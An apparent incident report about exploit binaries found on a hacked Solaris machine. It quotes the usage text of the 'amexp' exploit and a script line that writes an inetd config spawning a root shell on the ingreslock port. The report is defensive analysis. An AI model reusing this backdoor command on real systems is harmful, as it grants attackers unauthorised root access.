I found two binary-only exploits on a hacked machine.  The one of most
interest was "amexp" which when executed without arguments presents
the following:

    Usage: ./amexp address cache command type [port]

    Further help:

        address    -    system address
        cache      -    system hostname
        command    -    execute this command
        type       -    0: Solaris 2.5.1 stock,
                            1: Solaris 2.5.1 patched, 2.6 & 2.7
        port       -    optional port to bypass portmapper

A shell script that was included was "go.amexp" which contained:

./amexp $1 $2 "echo 'ingreslock stream tcp nowait root /bin/sh sh' >
/tmp/.xp;/usr/sbin/inetd -s /tmp/.xp" $3

The command is nearly identical to what is used for both tooltalk and
rpc.cmsd attacks

The proper patches were installed and I do not believe that it is the
statd/automountd exploit since
no indirect rpc services execution was attempted.

This incident is closed.